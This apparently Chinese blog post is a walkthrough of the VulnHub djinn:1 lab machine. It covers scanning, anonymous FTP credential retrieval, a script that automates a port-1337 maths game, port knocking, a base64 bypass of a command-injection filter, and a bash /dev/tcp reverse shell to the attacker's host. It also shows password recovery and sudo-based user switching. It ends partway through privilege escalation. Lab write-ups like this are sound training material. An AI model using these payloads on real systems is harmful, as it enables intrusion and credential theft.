热门标签
热门文章
- 1Hive 使用JDBC访问Hive_jdbc hive工具
- 2Vue3+Ts实现聊天机器人(chatBot-附代码)_vue聊天机器人
- 3Python字符串替换replace、截取[]、查找find、计数count、分割split_python replace string
- 4conda 配置清华源_conda 清华源
- 5Netty核心原理详解第一篇 Netty整体框架纵览_netty原理解析
- 6MySQL事务和索引
- 7什么是Symbol?在实际开发中怎么用?_symbol类型在实际开发中的应用
- 8利用AI实现人岗匹配,重新定义求职工作流
- 9想下载B站视频怎么操作?分享5个方法_bilibi视频下载
- 10Jenkins 解决GIT部署出现连续SCM部署的问题_没有在 scm 配置或者插件中的 git 存储库配置错误
当前位置: article > 正文
vulnhub靶机 djinn1_djinn1环境搭建
作者:Li_阴宅 | 2024-08-02 10:21:14
赞
踩
djinn1环境搭建
vulnhub靶机 djinn:1
目标为user.txt和root.txt
靶机配置
将靶机下载好后。在VM中选择打开虚拟机,在开启虚拟机之前,网络设置中调整为nat(与攻击机kali一个网段)。
渗透测试
使用nmap进行扫描
└─# nmap -p- -A -T4 192.168.5.130 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 10:01 CST Nmap scan report for 192.168.5.130 Host is up (0.00086s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt | -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt |_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.5.129 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp filtered ssh 1337/tcp open waste? | fingerprint-strings: | NULL: | ____ _____ _ | ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ | \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/ | ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___| | Let's see how good you are with simple maths | Answer my questions 1000 times and I'll give you your gift. | '*', 4) | RPCCheck: | ____ _____ _ | ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ | \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/ | ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___| | Let's see how good you are with simple maths | Answer my questions 1000 times and I'll give you your gift. |_ '+', 9) 7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+) |_http-server-header: Werkzeug/0.16.0 Python/2.7.15+ |_http-title: Lost in space 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port1337-TCP:V=7.91%I=7%D=9/10%Time=613ABC9D%P=x86_64-pc-linux-gnu%r(NU SF:LL,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\ SF:x20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20 SF:__\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\ SF:x20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x SF:20`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\ SF:x20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\ SF:|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\ SF:x20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:n\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths SF:\nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20 SF:you\x20your\x20gift\.\n\(3,\x20'\*',\x204\)\n>\x20")%r(RPCCheck,1BC,"\x SF:20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\ SF:x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\ SF:x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\ SF:x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x SF:20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\ SF:|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x2 SF:0\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\ SF:___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x SF:20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x SF:20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20you SF:r\x20gift\.\n\(3,\x20'\+',\x209\)\n>\x20"); MAC Address: 00:0C:29:EE:7F:B0 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Unix TRACEROUTE HOP RTT ADDRESS 1 0.86 ms 192.168.5.130 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 92.43 seconds
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
发现21端口开启,并且可以使用用户ftp进行匿名登录,22端口ssh服务被过滤,1337端口的文字显示这是个游戏,回答1000次就能获得礼物。7331是http服务,访问这个服务是要IP:7331进行访问。
测试21端口
匿名登录后,下载目录里的三个文件
└─# ftp 192.168.5.130 Connected to 192.168.5.130. 220 (vsFTPd 3.0.3) Name (192.168.5.130:root): ftp 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt -rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt 226 Directory send OK. ftp> get creds.txt local: creds.txt remote: creds.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for creds.txt (11 bytes). 226 Transfer complete. 11 bytes received in 0.00 secs (3.9378 kB/s) ftp> get game.txt local: game.txt remote: game.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for game.txt (128 bytes). 226 Transfer complete. 128 bytes received in 0.01 secs (9.0051 kB/s) ftp> get message.txt local: message.txt remote: message.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for message.txt (113 bytes). 226 Transfer complete. 113 bytes received in 0.00 secs (707.3818 kB/s) ftp> exit 221 Goodbye.
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
查看内容
└─# ls
creds.txt CVE-2018-7600 game.txt message.txt
└─# cat creds.txt
nitu:81299
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
获得一个凭据nitu:81299
由于22端口被过滤,先测试1337端口
测试1337端口
└─# telnet 192.168.5.130 1337 Trying 192.168.5.130... Connected to 192.168.5.130. Escape character is '^]'. ____ _____ _ / ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ | | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \ | |_| | (_| | | | | | | __/ | | | | | | | | | __/ \____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___| Let's see how good you are with simple maths Answer my questions 1000 times and I'll give you your gift. (6, '*', 7) > 42 (3, '*', 3) > 9 (9, '/', 1) > 2 Wrong answer Connection closed by foreign host.
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
输入正确结果会继续,错误结果会直接结束
那么编写脚本来进行这1000次尝试
#coding:utf-8 import logging import telnetlib import time import re def main(): try: tn = telnetlib.Telnet('192.168.5.130',port=1337) except: logging.warning("errr") time.sleep(0.5) loop=1 while loop<1002: data = tn.read_very_eager().decode('ascii') print(data) res = re.search('(.*?)\s>',data).group(1) datas = str(calc(res)).strip() print(str(loop)+":"+datas) loop=loop+1 tn.write(datas.encode('ascii')+b"\n") time.sleep(0.1) data = tn.read_very_eager().decode('ascii') return data def calc(res): res_str = res.strip('(').strip(")").replace("'","") muns = res_str.split(',') munber1 = muns[0].strip() orperator = muns[1].strip() munber2 = muns[2].strip() res = eval(munber1+orperator+munber2) return res print(main())
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
获得gitf 1356, 6784, 3409
> 997:1.4 (2, '+', 2) > 998:4 (3, '+', 6) > 999:9 (4, '*', 9) > 1000:36 (7, '/', 7) > 1001:1.0 Here is your gift, I hope you know what to do with it: 1356, 6784, 3409
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
暗语开启ssh端口
knock 192.168.5.130 1356 6784 3409
- 1
再次nmap扫描
└─# nmap -p- -A -T4 192.168.5.130 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 11:11 CST Nmap scan report for 192.168.5.130 Host is up (0.00076s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt | -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt |_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.5.129 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b8:cb:14:15:05:a0:24:43:d5:8e:6d:bd:97:c0:63:e9 (RSA) | 256 d5:70:dd:81:62:e4:fe:94:1b:65:bf:77:3a:e1:81:26 (ECDSA) |_ 256 6a:2a:ba:9c:ba:b2:2e:19:9f:5c:1c:87:74:0a:25:f0 (ED25519) 1337/tcp open waste? | fingerprint-strings: | NULL: | ____ _____ _ | ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ | \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/ | ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___| | Let's see how good you are with simple maths | Answer my questions 1000 times and I'll give you your gift. | '/', 6) | RPCCheck: | ____ _____ _ | ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ | \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/ | ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___| | Let's see how good you are with simple maths | Answer my questions 1000 times and I'll give you your gift. |_ '+', 8) 7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+) |_http-server-header: Werkzeug/0.16.0 Python/2.7.15+ |_http-title: Lost in space 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port1337-TCP:V=7.91%I=7%D=9/10%Time=613ACCE4%P=x86_64-pc-linux-gnu%r(NU SF:LL,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\ SF:x20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20 SF:__\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\ SF:x20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x SF:20`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\ SF:x20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\ SF:|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\ SF:x20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:n\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths SF:\nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20 SF:you\x20your\x20gift\.\n\(9,\x20'/',\x206\)\n>\x20")%r(RPCCheck,1BC,"\x2 SF:0\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\x SF:20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\x SF:20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\x SF:20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x2 SF:0\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\| SF:\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x20 SF:\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\_ SF:__\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x2 SF:0see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x2 SF:0my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20your SF:\x20gift\.\n\(7,\x20'\+',\x208\)\n>\x20"); MAC Address: 00:0C:29:EE:7F:B0 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.76 ms 192.168.5.130 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 92.77 seconds
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
22端口成功开启
测试7331端口
由于是http服务,那么进行目录扫描
└─# dirsearch -u "http://192.168.5.130:7331/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 130 ⨯ _|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220520 Output File: /root/.dirsearch/reports/192.168.5.130/_21-09-10_11-17-08.txt Error Log: /root/.dirsearch/logs/errors-21-09-10_11-17-08.log Target: http://192.168.5.130:7331/ [11:17:08] Starting: [11:17:31] 200 - 385B - /wish [11:18:09] 200 - 2KB - /genie Task Completed
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
进行访问
页面中显示可以实现我们的任何愿望,这里输入whoami试试
发现返回页面的URL中有结果,则这里有命令执行漏洞
尝试爆出密码
发现被拦截,那么使用burp测试所有特殊字符
发现如下被禁止的特殊字符
; / ? * ^ $
- 1
那么尝试使用base64绕过
在本地kali中
└─# echo "cat /etc/passwd"|base64
Y2F0IC9ldGMvcGFzc3dkCg==
- 1
- 2
- 3
- 4
在burp中
echo "Y2F0IC9ldGMvcGFzc3dkCg=="|base64 -d|bash
- 1
成功执行cat /etc/passwd
反弹shell
在本地进行监听
nc -lvnp 9000
- 1
在kali里输入
└─# echo "bash -i &> /dev/tcp/192.168.5.129/9000 0>&1"|base64
YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI5LzkwMDAgMD4mMQo=
- 1
- 2
然后在burp中输入
echo "YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI5LzkwMDAgMD4mMQo="|base64 -d|bash
- 1
得到shell
└─# nc -lvnp 9000
listening on [any] 9000 ...
connect to [192.168.5.129] from (UNKNOWN) [192.168.5.130] 42968
bash: cannot set terminal process group (730): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ whoami
whoami
www-data
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
切换为pythonshell,这里不切换的话,不能使用su切换用户。
www-data@djinn:/opt/80$ su root
su root
su: must be run from a terminal
- 1
- 2
- 3
python3 -c 'import pty;pty.spawn("/bin/bash")'
- 1
在当前目录发现几个文件,使用cat进行查看
www-data@djinn:/opt/80$ cat app.py cat app.py import subprocess from flask import Flask, redirect, render_template, request, url_for app = Flask(__name__) app.secret_key = "key" CREDS = "/home/nitish/.dev/creds.txt" RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"] def validate(cmd): if CREDS in cmd and "cat" not in cmd: return True try: for i in RCE: for j in cmd: if i == j: return False return True except Exception: return False @app.route("/", methods=["GET"]) def index(): return render_template("main.html") @app.route("/wish", methods=['POST', "GET"]) def wish(): execute = request.form.get("cmd") if execute: if validate(execute): output = subprocess.Popen(execute, shell=True, stdout=subprocess.PIPE).stdout.read() else: output = "Wrong choice of words" return redirect(url_for("genie", name=output)) else: return render_template('wish.html') @app.route('/genie', methods=['GET', 'POST']) def genie(): if 'name' in request.args: page = request.args.get('name') else: page = "It's not that hard" return render_template('genie.html', file=page) if __name__ == "__main__": app.run(host='0.0.0.0', debug=True)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
这里执行过滤,其中RCE中是被过滤的名单
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]
def validate(cmd):
if CREDS in cmd and "cat" not in cmd:
return True
try:
for i in RCE:
for j in cmd:
if i == j:
return False
return True
except Exception:
return False
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
其中CREDS是一个字符串,使用find进行查找
www-data@djinn:/opt/80$ find / -name *creds* -print 2>&1| grep -v "Permission denied"
<me *creds* -print 2>&1| grep -v "Permission denied"
/home/nitish/.dev/creds.txt
/srv/ftp/creds.txt
- 1
- 2
- 3
- 4
- 5
找到两处内容
/home/nitish/.dev/creds.txt
/srv/ftp/creds.txt
其中/srv/ftp/creds.txt之前在ftp中下载了,其中的内容为nitu:81299
用cat查看/home/nitish/.dev/creds.txt其中的内容
www-data@djinn:/opt/80$ cat /home/nitish/.dev/creds.txt
cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9
- 1
- 2
- 3
获得nitish的密码nitish:p4ssw0rdStr3r0n9
使用su进行切换,并获得第一个user.txt
www-data@djinn:/opt/80$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:/opt/80$
nitish@djinn:/opt/80$ cat /home/nitish/user.txt
cat /home/nitish/user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
提权
查看sudo权限
nitish@djinn:/opt/80$ sudo -l
sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
这里genie命令可以使用sam的身份进行运行,而且无需passwd
nitish@djinn:/opt/80$ genie -h genie -h usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish I know you've came to me bearing wishes in mind. So go ahead make your wishes. positional arguments: wish Enter your wish optional arguments: -h, --help show this help message and exit -g, --god pass the wish to god -p SHELL, --shell SHELL Gives you shell -e EXEC, --exec EXEC execute command
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
经过尝试,这几个参数都不好使用,使用man再次进行查看
nitish@djinn:/opt/80$ man genie man genie WARNING: terminal is not fully functional - (press RETURN) man(8) genie man page man(8) NAME genie - Make a wish SYNOPSIS genie [-h] [-g] [-p SHELL] [-e EXEC] wish DESCRIPTION genie would complete all your wishes, even the naughty ones. We all dream of getting those crazy privelege escalations, this will even help you acheive that. OPTIONS wish This is the wish you want to make . -g, --god Sometime we all would like to make a wish to god, this option let you make wish directly to God;r q to quit) Manual page genie(8) line 2 (press h for help or q to quit) Though genie can't gurantee you that your wish will be heard by God, he's a busy man you know; -p, --shell Well who doesn't love those. You can get shell. Ex: -p "/bin/sh" -e, --exec Execute command on someone else computer is just too damn fun, but this comes with some restrictions. -cmd You know sometime all you new is a damn CMD, windows I love you. SEE ALSO mzfr.github.io BUGS There are shit loads of bug in this program, it's all about finding one. Manual page genie(8) line 25 (press h for help or q to quit)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
发现一个参数 -cmd
进行尝试genie -cmd id,可以正常运行,exit时会出现机具嘲讽的You are a noob hacker!!
nitish@djinn:/opt/80$ genie -cmd id
genie -cmd id
my man!!
$ id
id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
$ exit
exit
You are a noob hacker!!
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
使用sam的身份运行id,成功的切换为sam
nitish@djinn:/opt/80$ sudo -u sam genie -cmd id
sudo -u sam genie -cmd id
my man!!
$ id
id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
- 1
- 2
- 3
- 4
- 5
- 6
再次查看sudo权限
sam@djinn:/opt/80$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
发现lago命令可以用root的身份运行,并且不需要passwd
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
这里尝试后发现没什么可以利用的。
sam@djinn:/opt/80$ sudo -u root /root/lago sudo -u root /root/lago What do you want to do ? 1 - Be naughty 2 - Guess the number 3 - Read some damn files 4 - Work Enter your choice:1 1 Working on it!! sam@djinn:/opt/80$ sudo -u root /root/lago sudo -u root /root/lago What do you want to do ? 1 - Be naughty 2 - Guess the number 3 - Read some damn files 4 - Work Enter your choice:2 2 Choose a number between 1 to 100: Enter your number: 52 52 Better Luck next time sam@djinn:/opt/80$ sudo -u root /root/lago sudo -u root /root/lago What do you want to do ? 1 - Be naughty 2 - Guess the number 3 - Read some damn files 4 - Work Enter your choice:3 3 Enter the full of the file to read: /etc/passwd /etc/passwd User root is not allowed to read /etc/passwd sam@djinn:/opt/80$ sudo -u root /root/lago sudo -u root /root/lago What do you want to do ? 1 - Be naughty 2 - Guess the number 3 - Read some damn files 4 - Work Enter your choice:4 4 work your ass off!!
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
使用base64进行文件转移,使用base64 app.pyc,然后将加密的结果复制到本地进行解密,获得原文件。
